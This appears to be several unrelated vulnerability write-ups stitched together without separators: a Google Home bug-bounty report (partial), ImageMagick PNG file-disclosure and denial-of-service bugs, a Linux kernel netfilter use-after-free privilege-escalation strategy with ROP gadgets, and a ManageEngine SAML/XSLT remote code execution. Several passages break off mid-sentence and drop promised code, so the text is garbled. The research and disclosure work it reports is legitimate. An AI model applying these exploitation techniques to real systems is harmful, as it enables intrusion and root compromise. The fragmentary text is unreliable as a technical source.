pre-filled with my WiFi password in plaintext. It also provides a firmware update mechanism, which I imagine could be vulnerable to attack.
Another approach would be looking for the victim’s router and trying to attack that. My router’s IP,
192.168.1.254
, shows up among the first results when you Google “default router IPs”. You could write a script to try these. My router’s configuration interface also immediately returns my WiFi password in plaintext. Luckily, I’ve changed the default admin password, so at the very least an attacker with access to it wouldn’t be able to modify the settings, but most people don’t change this password, so you could find it by searching for “[brand name] router password”, then set the DNS server to your own, install malicious firmware updates, etc. Even if the victim changed their router’s password, it may still be vulnerable. For example, in June 2020, a researcher found a buffer overflow vulnerability in the web interface on 79 Netgear router models that led to a root shell, and described the process as “easy”.
PoC #3: Read/write arbitrary files on device
I also found a way to read/write arbitrary files on the linked device using the
DOM.setFileInputFiles
and
Page.setDownloadBehavior
methods of the Chrome DevTools Protocol.
The following reproduction steps first write a file,
variables at the top of the script. Get the URL of the server, like
http://[IP]:[port]
. This must be reachable by the Google Home.
Run
node write.js [Google Home IP] [write server URL] /tmp
, inserting the appropriate values. You can get the Google Home’s IP from the Google Home app. The file will be written to
/tmp/example_file.txt
.
Run
python3 read_server.py
. You can modify the host/port like before.
Run
node read.js [Google Home IP] [read server URL]
. When prompted for a file path to read, enter
/tmp/example_file.txt
.
Verify that
example_file.txt
was dumped from the device to
dumped_files/example_file.txt
Since I couldn’t explore the filesystem of my Google Home (and
<input type="file" webkitdirectory>
didn’t work to upload folders instead of files), I’m not sure exactly what the impact of this was. I was able to find some info about the filesystem structure from the “open source licenses” info, and from the DEFCON talk on the Google Home. I dumped a few binaries like
/system/chrome/cast_shell
and
/system/chrome/lib/libassistant.so
, then ran
strings
on them, looking for interesting files to steal or tamper with. It looks like
, hex edit it, and overwrite the original with my modified version, and the changes were applied after a reboot. If, for example, a bug in a config file parser was found, I imagine that this could have potentially led to RCE?
The fixes
I’m aware of the following fixes deployed by Google:
You must request an invite to the “Home” that the device is registered to in order to link your account to it through the
/deviceuserlinksbatch
API. If you’re not added to the Home but you try to link your account this way, you’ll get a
PERMISSION_DENIED
error.
“Call [phone number]” commands can’t be initiated remotely through routines.
You can still deauth the Google Home and access its device info through the
/setup/eureka_info
endpoint, but you can’t use it to link your account anymore, and you can’t access the rest of the local API (because you can’t get a local auth token).
On devices with a display (e.g. Google Nest Hub), the setup network is protected with a WPA2 password which appears as a QR code on the display (scanned with the Google Home app), which adds an additional layer of protection.
Additionally, on these devices, you can say “add my voice” to bring up a screen with a link code instructing you to visit https://g.co/nest/voice. You can link your account to the device through this website, even if you aren’t added to its Home (which is fine, because this still requires physical access to the device). The “add my voice” command doesn’t appear to work on the Google Home Mini, probably since it doesn’t have a display that it can use to provide a link code. I guess if Google wanted to implement this, they could make it speak the link code out loud or text it to a provided phone number or something.
Reflection/conclusions
Google Home’s architecture is based on Chromecast. Chromecast doesn’t place much emphasis on security against proximity-based attacks because it’s mostly unnecessary. What’s the worst that could happen if someone hacks your Chromecast? Maybe they could play obscene videos? However, the Google Home is a much more security-critical device, due to the fact that it has control over your other smart home devices, and a microphone. If the Google Home architecture had been built from scratch, I imagine that these issues would have never existed.
Ever since the first Google Home device released in November 2016, Google continued to add more and more features to the device’s cloud APIs as time went on, like scheduled routines (July 2018) and the Local Home SDK (April 2020). I’m guessing that the engineers behind these features were under the assumption that the account linking process was secure.
Many other security researchers had already given the Google Home a look before me, but somehow it appears that none of them noticed these seemingly glaring issues. I guess they were mainly focused on the endpoints that the local API exposed and what an attacker could do with those. However, these endpoints only allow for adjusting a few basic device settings, and not much else. While the issues I discovered may seem obvious in hindsight, I think that they were actually pretty subtle. Rather than making a local API request to control the device, you instead make a local API request to retrieve innocuous-looking device info, and use that info along with cloud APIs to control the device.
As the DEFCON talk shows, the low-level security of the device is generally pretty good, and buffer overflows and such are hard to come by. The issues I found were lurking at the high level.
Many thanks to Google for the incredibly generous rewards!
Disclosure timeline
01/08/2021: Reported
01/10/2021: Triaged
01/20/2021: Closed (Intended Behavior)
I was busy with school stuff, so it took me a while to respond
During my research, I did a little digging within the Google Home app. I didn’t find any security issues here, but I did discover some things about the local API that the unofficial docs don’t yet include.
show_led
endpoint
To find a list of local API endpoints (and potentially some undocumented ones), I searched for a known endpoint (
get_app_device_id
) in the decompiled sources:
The information I was looking for was in
defpackage/ufo.java
:
SHOW_LED
sounded interesting, and it wasn’t in the unofficial docs. Searching for where this constant is used led me to
StereoPairCreationActivity
:
With the help of JADX’s amazing “rename symbol” feature, and after renaming some methods, I was able to find the class responsible for constructing the JSON payload for this endpoint:
Looks like the payload consists of an integer
animation_id
. We can send use the endpoint like so:
$ curl --insecure -X POST -H 'cast-local-authorization-token: [token]' -H 'Content-Type: application/json' -d '{"animation_id":2}' https://[Google Home IP]:8443/setup/assistant/show_led
This makes the LEDs play a slow pulsing animation. Unfortunately it seems that there are only two animations:
1
(reset LEDs to normal) and
2
(continuous pulsing). Oh, well.
Wi-Fi password encryption
I was also able to find the algorithm used to encrypt the user’s Wi-Fi password before sending it through the
/setup/connect_wifi
endpoint. Now that HTTPS is used, this encryption seems redundant, but I imagine that this was originally implemented to protect against MITM attacks exposing the Wi-Fi password. Anyway, we see that the password is encrypted using RSA PKCS1 and the device’s public key (from
/setup/eureka_info
):
Footnote: Deauth attacks on Google Home Mini
I mentioned above that the Google Home Mini doesn’t support WPA3, nor 802.11w. I’d like to clarify how I discovered this.
Since my router doesn’t support these, I borrowed a friend’s router running OpenWrt, a FOSS operating system for routers, which does support 802.11w and WPA3.
There are three 802.11w modes you can choose from: disabled (default), optional, and required. (“Optional” means that it’s used only for devices that support it.) While I was using “required”, my Google Home Mini was unable to connect, meanwhile my Pixel 5 (Android 12) and MacBook Pro (macOS 12.4) had no issues. Same results when I enabled WPA3. I tried “optional” and the Google Home Mini connected, but was still vulnerable to deauth attacks (as expected).
I tested this on the latest Google Home Mini firmware at the time of writing (1.56.309385, August 2022), on 1st gen (codename
mushroom
) hardware. I’m assuming this is a limitation of the Wi-Fi chip that it uses, rather than a software issue.
ImageMagick is a free and open-source software suite for displaying, converting, and editing image files. It can read and write over 200 image file formats and, therefore, is very common to find it in websites worldwide since there is always a need to process pictures for users’ profiles, catalogs, etc.
In a recent APT Simulation engagement, the Ocelot team identified that ImageMagick was used to process images in a Drupal-based website, and hence, the team decided to try to find new vulnerabilities in this component, proceeding to download the latest version of ImageMagick, 7.1.0-49 at that time. As a result, two zero days were identified:
CVE-2022-44267: ImageMagick 7.1.0-49 is vulnerable to Denial of Service. When it parses a PNG image (e.g., for resize), the convert process could be left waiting for stdin input.
CVE-2022-44268: ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary remote file (if the ImageMagick binary has permissions to read it).
How to trigger the exploitation?
An attacker needs to upload a malicious image to a website using ImageMagick, in order to exploit the above mentioned vulnerabilities remotely.
The Ocelot team is very grateful for the team of volunteers of ImageMagick, who validated and released the patches needed in a timely manner:
In this blog, the technical details of the vulnerabilities are explained.
CVE-2022-44267: Denial of service
ImageMagick: 7.1.0-49
When ImageMagick parses a PNG file, for example in a resize operation when receiving an image, the convert process could be left waiting for stdin input leading to a Denial of Service since the process won’t be able to process other images.
A malicious actor could craft a PNG or use an existing one and add a textual chunk type (e.g., tEXt). These types have a keyword and a text string. If the keyword is the string “profile” (without quotes) then ImageMagick will interpret the text string as a filename and will load the content as a raw profile. If the specified filename is “-“ (a single dash) ImageMagick will try to read the content from standard input potentially leaving the process waiting forever.
Exploitation Path Execution:
Upload image to trigger ImageMagick command, like “convert”
ReadOnePNGImage (coders/png.c:2164)
Reading “tEXt” chunk:
SetImageProfile (MagickCore/property.c:4360):Checking if keyword equals to “profile”:Copying the text string as filename in line 4720 and saving the content in line 4722:FileToStringInfo to store the content into string_info->datum, (MagickCore/string.c:1005):
When ImageMagick parses the PNG file, for example in a resize operation, the resulting image could have embedded the content of an arbitrary remote file from the website (if magick binary has permissions to read it).
A malicious actor could craft a PNG or use an existing one and add a textual chunk type (e.g., tEXt). These types have a keyword and a text string. If the keyword is the string “profile” (without quotes) then ImageMagick will interpret the text string as a filename and will load the content as a raw profile, then the attacker can download the resized image which will come with the content of a remote file.
Exploitation Path Execution:
Upload image to trigger ImageMagick command, like “convert”
ReadOnePNGImage (coders/png.c:2164):
– Reading tEXt chunk:
SetImageProfile (MagickCore/property.c:4360)
Checking if keyword equals to “profile”
Copying the text string as filename in line 4720 and saving the content in line 4722:
FileToStringInfo to store the content into string_info->datum, (MagickCore/string.c:1005):
If a valid (and accessible) filename is provided, the content will be returned to the caller function (FileToStringInfo) and the StringInfo object will return to the SetImageProperty function, saving the blob into the new image generated, thanks to the function SetImageProfile:
This new image will be available to download by the attackers with the arbitrary website file content embedded inside.
PoC: Malicious PNG content to leak “/etc/passwd” file:
It’s been a while since our last technical blogpost, so here’s one right on time for the Christmas holidays. We describe a method to exploit a use-after-free in the Linux kernel when objects are allocated in a specific slab cache, namely the
kmalloc-cg
series of SLUB caches used for cgroups. This vulnerability is assigned CVE-2022-32250 and exists in Linux kernel versions 5.18.1 and prior.
The use-after-free vulnerability in the Linux kernel netfilter subsystem was discovered by NCC Group’s Exploit Development Group (EDG). They published a very detailed write-up with an in-depth analysis of the vulnerability and an exploitation strategy that targeted Linux Kernel version 5.13. Additionally, Theori published their own analysis and exploitation strategy, this time targetting the Linux Kernel version 5.15. We strongly recommend having a thorough read of both articles to better understand the vulnerability prior to reading this post, which almost exclusively focuses on an exploitation strategy that works on the latest vulnerable version of the Linux kernel, version 5.18.1.
The aforementioned exploitation strategies are different from each other and from the one detailed here since the targeted kernel versions have different peculiarities. In version 5.13, allocations performed with either the
GFP_KERNEL
flag or the
GFP_KERNEL_ACCOUNT
flag are served by the
kmalloc-*
slab caches. In version 5.15, allocations performed with the
GFP_KERNEL_ACCOUNT
flag are served by the
kmalloc-cg-*
slab caches. While in both 5.13 and 5.15 the affected object,
nft_expr,
is allocated using
GFP_KERNEL,
the difference in exploitation between them arises because a commonly used heap spraying object, the System V message structure (
struct msg_msg)
, is served from
kmalloc-*
in 5.13 but from
kmalloc-cg-*
in 5.15. Therefore, in 5.15,
struct msg_msg
cannot be used to exploit this vulnerability.
In 5.18.1, the object involved in the use-after-free vulnerability,
nft_expr,
is itself allocated with
GFP_KERNEL_ACCOUNT
in the
kmalloc-cg-*
slab caches. Since the exploitation strategies presented by the NCC Group and Theori rely on objects allocated with
GFP_KERNEL,
they do not work against the latest vulnerable version of the Linux kernel.
The subject of this blog post is to present a strategy that works on the latest vulnerable version of the Linux kernel.
Vulnerability
Netfilter sets can be created with a maximum of two associated expressions that have the
NFT_EXPR_STATEFUL
flag. The vulnerability occurs when a set is created with an associated expression that does not have the
NFT_EXPR_STATEFUL
flag, such as the
dynset
and
lookup
expressions. These two expressions have a reference to another set for updating and performing lookups, respectively. Additionally, to enable tracking, each set has a bindings list that specifies the objects that have a reference to them.
During the allocation of the associated
dynset
or
lookup
expression objects, references to the objects are added to the bindings list of the referenced set. However, when the expression associated to the set does not have the
NFT_EXPR_STATEFUL
flag, the creation is aborted and the allocated expression is destroyed. The problem occurs during the destruction process where the bindings list of the referenced set is not updated to remove the reference, effectively leaving a dangling pointer to the freed expression object. Whenever the set containing the dangling pointer in its bindings list is referenced again and its bindings list has to be updated, a use-after-free condition occurs.
Exploitation
Before jumping straight into exploitation details, first let’s see the definition of the structures involved in the vulnerability:
structure represents an nftables set, a built-in generic infrastructure of nftables that allows using any supported selector to build sets, which makes possible the representation of maps and verdict maps (check the corresponding nftables wiki entry for more details).
expressions have to be bound to a given set on which the add, delete, or update operations will be performed.
When a given
nft_set
has expressions bound to it, they are added to the
nft_set.bindings
double linked list. A visual representation of an
nft_set
with 2 expressions is shown in the diagram below.
The
binding
member of the
nft_lookup
and
nft_dynset
expressions is defined as follows:
// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L576
/**
* struct nft_set_binding - nf_tables set binding
*
* @list: set bindings list node
* @chain: chain containing the rule bound to the set
* @flags: set action flags
*
* A set binding contains all information necessary for validation
* of new elements added to a bound set.
*/
struct nft_set_binding {
struct list_head list;
const struct nft_chain *chain;
u32 flags;
};
The important member in our case is the
list
member. It is of type
struct list_head
, the same as the
nft_lookup.binding
and
nft_dynset.binding
members. These are the foundation for building a double linked list in the kernel. For more details on how linked lists in the Linux kernel are implemented refer to this article.
With this information, let’s see what the vulnerability allows to do. Since the UAF occurs within a double linked list let’s review the common operations on them and what that implies in our scenario. Instead of showing a generic example, we are going to use the linked list that is build with the
nft_set
and the expressions that can be bound to it.
In the diagram shown above, the simplified pseudo-code for removing the
expressions are defined at different offsets, the write operation is done at different offsets.
With this out of the way we can now list the write primitives that this vulnerability allows, depending on which expression is the vulnerable one:
nft_lookup
: Write an 8-byte address at offset 24 (
binding.list->next
) or offset 32 (
binding.list->prev
) of a freed
nft_lookup
object.
nft_dynset
: Write an 8-byte address at offset 64 (
binding.list->next
) or offset 72 (
binding.list->prev
) of a freed
nft_dynset
object.
The offsets mentioned above take into account the fact that
nft_lookup
and
nft_dynset
expressions are bundled in the
data
member of an
nft_expr
object (the data member is at offset 8).
In order to do something useful with the limited write primitves that the vulnerability offers we need to find objects allocated within the same slab caches as the
nft_lookup
and
nft_dynset
expression objects that have an interesting member at the listed offsets.
Therefore, the objects suitable for exploitation will be different from those of the publicly available exploits targetting version 5.13 and 5.15.
Exploit Strategy
The ultimate primitives we need to exploit this vulnerability are the following:
Memory leak primitive: Mainly to defeat KASLR.
RIP control primitive: To achieve kernel code execution and escalate privileges.
However, neither of these can be achieved by only using the 8-byte write primitive that the vulnerability offers. The 8-byte write primitive on a freed object can be used to corrupt the object replacing the freed allocation. This can be leveraged to force a partial free on either the
nft_set
,
nft_lookup
or the
nft_dynset
objects.
Partially freeing
nft_lookup
and
nft_dynset
objects can help with leaking pointers, while partially freeing an
nft_set
object can be pretty useful to craft a partial fake
nft_set
to achieve RIP control, since it has an
ops
member that points to a function table.
Therefore, the high-level exploitation strategy would be the following:
Leak the kernel image base address.
Leak a pointer to an
nft_set
object.
Obtain RIP control.
Escalate privileges by overwriting the kernel’s
MODPROBE_PATH
global variable.
Return execution to userland and drop a root shell.
The following sub-sections describe how this can be achieved.
Partial Object Free Primitive
A partial object free primitive can be built by looking for a kernel object allocated with
GFP_KERNEL_ACCOUNT
within kmalloc-cg-64 or kmalloc-cg-96, with a pointer at offsets 24 or 32 for kmalloc-cg-64 or at offsets 64 and 72 for kmalloc-cg-96. Afterwards, when the object of interest is destroyed,
kfree()
has to be called on that pointer in order to partially free the targeted object.
One of such objects is the
fdtable
object, which is meant to hold the file descriptor table for a given process. Its definition is shown below.
// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/fdtable.h#L27
struct fdtable {
unsigned int max_fds; /* 0 4 */
/* XXX 4 bytes hole, try to pack */
struct file * * fd; /* 8 8 */
long unsigned int * close_on_exec; /* 16 8 */
long unsigned int * open_fds; /* 24 8 */
long unsigned int * full_fds_bits; /* 32 8 */
struct callback_head rcu __attribute__((__aligned__(8))); /* 40 16 */
/* size: 56, cachelines: 1, members: 6 */
/* sum members: 52, holes: 1, sum holes: 4 */
/* forced alignments: 1 */
/* last cacheline: 56 bytes */
} __attribute__((__aligned__(8)));
The size of an
fdtable
object is 56, is allocated in the kmalloc-cg-64 slab and thus can be used to replace
nft_lookup
objects. It has a member of interest at offset 24 (
open_fds
), which is a pointer to an unsigned long integer array. The allocation of
fdtable
objects is done by the kernel function
alloc_fdtable()
, which can be reached with the following call stack.
pointer can be triggered by simply terminating the child process that allocated the
fdtable
object.
Leaking Pointers
The exploit primitive provided by this vulnerability can be used to build a leaking primitive by overwriting the vulnerable object with an object that has an area that will be copied back to userland. One such object is the System V message represented by the
msg_msg
structure, which is allocated in
kmalloc-cg-*
slab caches starting from kernel version 5.14.
The
msg_msg
structure acts as a header of System V messages that can be created via the userland
msgsnd()
function. The content of the message can be found right after the header within the same allocation. System V messages are a widely used exploit primitive for heap spraying.
Since the size of the allocation for a System V message can be controlled, it is possible to allocate it in both kmalloc-cg-64 and kmalloc-cg-96 slab caches.
It is important to note that any data to be leaked must be written past the first 48 bytes of the message allocation, otherwise it would overwrite the
msg_msg
header. This restriction discards the
nft_lookup
object as a candidate to apply this technique to as it is only possible to write the pointer either at offset 24 or offset 32 within the object. The ability of overwriting the
msg_msg.m_ts
member, which defines the size of the message, helps building a strong out-of-bounds read primitive if the value is large enough. However, there is a check in the code to ensure that the
m_ts
member is not negative when interpreted as a signed long integer and heap addresses start with
0xffff
, making it a negative long integer.
Leaking an
nft_set
Pointer
Leaking a pointer to an
nft_set
object is quite simple with the memory leak primitive described above. The steps to achieve it are the following:
1. Create a target set where the expressions will be bound to.
2. Create a rule with a lookup expression bound to the target set from step 1.
3. Create a set with an embedded
nft_dynset
expression bound to the target set. Since this is considered an invalid expression to be embedded to a set, the
nft_dynset
object will be freed but not removed from the target set bindings list, causing a UAF.
4. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed
nft_dynset
object (via
msgsnd()
function). Tag all the messages at offset 24 so the one corrupted with the
nft_set
pointer can later be identified.
5. Remove the rule created, which will remove the entry of the
nft_lookup
expression from the target set’s bindings list. Removing this from the list effectively writes a pointer to the target
nft_set
object where the original
binding.list.prev
member was (offset 72). Since the freed
nft_dynset
object was replaced by a System V message, the pointer to the
nft_set
will be written at offset 24 within the message data.
6. Use the userland
msgrcv()
function to read the messages and check which one does not have the tag anymore, as it would have been replaced by the pointer to the
nft_set
.
Leaking a Kernel Function Pointer
Leaking a kernel pointer requires a bit more work than leaking a pointer to an
nft_set
object. It requires being able to partially free objects within the target set bindings list as a means of crafting use-after-free conditions. This can be done by using the partial object free primitive using
fdtable
object already described. The steps followed to leak a pointer to a kernel function are the following.
1. Increase the number of open file descriptors by calling
dup()
on
stdout
65 times.
2. Create a target set where the expressions will be bound to (different from the one used in the `
nft_set
` adress leak).
3. Create a set with an embedded
nft_lookup
expression bound to the target set. Since this is considered an invalid expression to be embedded into a set, the
nft_lookup
object will be freed but not removed from the target set bindings list, causing a UAF.
4. Spray
fdtable
objects in order to replace the freed
nft_lookup
from step 3.
5. Create a set with an embedded
nft_dynset
expression bound to the target set. Since this is considered an invalid expression to be embedded into a set, the
nft_dynset
object will be freed but not removed from the target set bindings list, causing a UAF. This addition to the bindings list will write the pointer to its binding member into the
open_fds
member of the
fdtable
object (allocated in step 4) that replaced the
nft_lookup
object.
6. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed
nft_dynset
object (via
msgsnd()
function). Tag all the messages at offset 8 so the one corrupted can be identified.
7. Kill all the child processes created in step 4 in order to trigger the partial free of the System V message that replaced the
nft_dynset
object, effectively causing a UAF to a part of a System V message.
8. Spray
time_namespace
objects in order to replace the partially freed System V message allocated in step 7. The reason for using the
time_namespace
objects is explained later.
9. Since the System V message header was not corrupted, find the System V message whose tag has been overwritten. Use
msgrcv()
to read the data from it, which is overlapping with the newly allocated
time_namespace
object. The offset 40 of the data portion of the System V message corresponds to
time_namespace.ns->ops
member, which is a function table of functions defined within the kernel core. Armed with this information and the knowledge of the offset from the kernel base image to this function it is possible to calculate the kernel image base address.
10. Clean-up the child processes used to spray the
time_namespace
objects.
time_namespace
objects are interesting because they contain an
ns_common
structure embedded in them, which in turn contains an
ops
member that points to a function table with functions defined within the kernel core. The
member is executed when an item has to be removed from the set. The item removal can be done from a rule that removes an element from a set when certain criteria is matched. Using the
The snippet above shows the creation of a table, a chain, and a set that contains elements of type
ipv4_addr
(i.e. IPv4 addresses). Then a rule is added, which deletes the item
127.0.0.1
from the set
my_set
when an incoming packet has the source IPv4 address
127.0.0.1
. Whenever a packet matching that criteria is processed via nftables, the
delete
function pointer of the specified set is called.
Therefore, RIP control can be achieved with the following steps. Consider the target set to be the
nft_set
object whose address was already obtained.
Add a rule to the table being used for exploitation in which an item is removed from the target set when the source IP of incoming packets is
127.0.0.1
.
Partially free the
nft_set
object from which the address was obtained.
Spray System V messages containing a partially fake
nft_set
object containing a fake
ops
table, with a given value for the
ops->delete
member.
Trigger the call of
nft_set->ops->delete
by locally sending a network packet to
127.0.0.1
. This can be done by simply opening a TCP socket to
127.0.0.1
at any port and issuing a
connect()
call.
Escalating Privileges
Once the control of the RIP register is achieved and thus the code execution can be redirected, the last step is to escalate privileges of the current process and drop to an interactive shell with root privileges.
A way of achieving this is as follows:
Pivot the stack to a memory area under control. When the
delete
function is called, the RSI register contains the address of the memory region where the nftables register values are stored. The values of such registers can be controlled by adding an
immediate
expression in the rule created to achieve RIP control.
Afterwards, since the nftables register memory area is not big enough to fit a ROP chain to overwrite the
MODPROBE_PATH
global variable, the stack is pivoted again to the end of the fake
The stack pivot gadgets and ROP chain used can be found below.
// ROP gadget to pivot the stack to the nftables registers memory area
0xffffffff8169361f: push rsi ; add byte [rbp+0x310775C0], al ; rcr byte [rbx+0x5D], 0x41 ; pop rsp ; ret ;
// ROP gadget to pivot the stack to the memory allocation holding the target nft_set
0xffffffff810b08f1: pop rsp ; ret ;
When the execution flow is redirected, the RSI register contains the address otf the nftables’ registers memory area. This memory can be controlled and thus is used as a temporary stack, given that the area is not big enough to hold the entire ROP chain. Afterwards, using the second gadget shown above, the stack is pivoted towards the end of the fake
nft_set
object.
// ROP chain used to overwrite the MODPROBE_PATH global variable
0xffffffff8148606b: pop rax ; ret ;
0xffffffff8120f2fc: pop rdx ; ret ;
0xffffffff8132ab39: mov qword [rax], rdx ; ret ;
It is important to mention that the stack pivoting gadget that was used performs memory dereferences, requiring the address to be mapped. While experimentally the address was usually mapped, it negatively impacts the exploit reliability.
Wrapping Up
We hope you enjoyed this reading and could learn something new. If you are hungry for more make sure to check our other blog posts.
We wish y’all a great Christmas holidays and a happy new year! Here’s to a 2023 with more bugs, exploits, and write ups!
On January 10, 2023, ManageEngine released a security advisory for CVE-2022-47966 (discovered by Khoadha of Viettel Cyber Security) affecting a wide range of products. The vulnerability allows an attacker to gain remote code execution by issuing a HTTP POST request containing a malicious SAML response. This vulnerability is a result of using an outdated version of Apache Santuario for XML signature validation.
Patch Analysis
We started our initial research by examining the differences between ServiceDesk Plus version 14003 and version 14004. By default, Service Desk is installed into
C:\Program Files\ManageEngine\ServiceDesk
. We installed both versions and extracted the jar files for comparison.
While there are many jar files that have been updated, we notice that there was a single jar file that has been completely changed.
libxmlsec
from Apache Santuario was updated from 1.4.1 to 2.2.3. Version 1.4.1 is over a decade old.
Jar differences
That is a large version jump, but if we start with the 1.4.2 release notes we find an interesting change:
Switch order of XML Signature validation steps. See Issue 44629.
Issue 44629 can be found here. It describes switching the order of XML signature validation steps and the security implications.
XML Signature Validation
XML signature validation is a complex beast, but it can be simplified down to the the following two steps:
Reference Validation – validate that each
<Reference>
element within the
<SignedInfo>
element has a valid digest value.
Signature Validation – cryptographically validate the
<SignedInfo>
element. This assures that the
<SignedInfo>
element has not been tampered with.
While the official XML signature validation spec lists reference validation followed by signature validation, these two steps can be performed in any order. Since the reference validation step can involve processing attacker controlled XML
Transforms
, one should always perform the signature validation step first to ensure that the transforms came from a trusted source.
SAML Information Flow Refresher
Applications that support single sign-on typically use an authorization solution like SAML. When a user logs into a remote service, that service forwards the authentication request to the SAML Identity Provider. The SAML Identity Provider will then validate that the user credentials are correct and that they are authorized to access the specified service. The Identity Provider then returns a response to the client which is forwarded to the Service Provider.
The information flow of a login request via SAML can been seen below. One of the critical pieces is understanding that the information flow uses the client’s browser to relay all information between the Service Provider (SP) and the Identity Provider (IDP). In this attack, we send a request containing malicious SAML XML directly to the service provider’s Assertion Consumer (ACS) URL.
Information flow via https://cloudsundial.com/
The Vulnerability
Vulnerability Ingredient 1: SAML Validation Order
Understanding that SAML information flow allows an attacker to introduce or modify the SAML data in transit, it should now be clear why the Apache Santuario update to now perform signature validation to occur before reference validation was so important. This vulnerability will abuse the verification order as the first step in exploitation. See below for the diff between v1.4.1 and v.1.4.2.
1.4.1 vs 1.4.2
In v1.4.1, reference validation happened near the top of the code block with the call to
si.verify()
. In v1.4.2, the call to
si.verify()
was moved to the end of the function after the signature verification in
sa.verify(sigBytes).
Vulnerability Ingredient 2: XSLT Injection
Furthermore, each
<Reference>
element can contain a
<Transform>
element responsible for describing how to modify an element before calculating its digest. Transforms allow for arbitrarily complex operations through the use of XSL Transformations (XSLT).
XSLT is a turing-complete language and, in the ManageEngine environment, it is capable of executing arbitrary Java code. We can supply the following snippet to execute an arbitrary system command:
Abusing the order of SAML validation in Apache Santuario v1.4.1 and Java’s XSLT library providing access to run arbitrary Java classes, we can exploit this vulnerability in ManageEngine products to gain remote code execution.
SAML SSO Configuration
Security Assertion Markup Language (SAML) is a specification for sharing authentication and authorization information between an application or service provider and an identity provider. SAML with single sign on allows users to not have to worry about maintaining credentials for all of the apps they use and it gives IT administrators a centralized location for user management.
SAML uses XML signature verification to ensure the secure transfer of messages passed between service providers and identity providers.
We can enable SAML SSO by navigating to
Admin -> Users & Permissions -> SAML Single Sign On
where we can enter our identity provider information. Once properly configured, we will see “Log in with SAML Single Sign On” on the logon page:
Since ServiceDesk runs as a service, there is no desktop to display the GUI for
notepad.exe
so we use ProcessExplorer to check the success of the exploit.
Notepad running
This proof of concept was also tested against Endpoint Central and we expect this POC to work unmodified on many of the ManageEngine products that share some of their codebase with ServiceDesk Plus or EndpointCentral.
Notably, the AD-related products (AdManager, etc) have additional checks on the SAML responses that must pass. They perform checks to verify that the SAML response looks like it came from the expected identity provider. Our POC has an optional
--issuer
argument to provide information to use for the
<Issuer>
element. Additionally, AD-related products have a different SAML logon endpoint URL that contains a guid. How to determine this information in an automated fashion is left as an exercise for the reader.
In summary, when Apache Santuario is <= v1.4.1, the vulnerability is trivially exploitable and made possible via several conditions:
Reference validation is performed before signature validation, allowing for the execution of malicious XSLT transforms.
Execution of XSLT transforms allows an attacker to execute arbitrary Java code.
This vulnerability is still exploitable even when Apache Santuario is between v1.4.1 and v2.2.3, which some of the affected ManageEngine products were using at the time, such as Password Manager Pro. The original research, Khoadha, documents further bypasses of validation in their research and is definitely worth a read.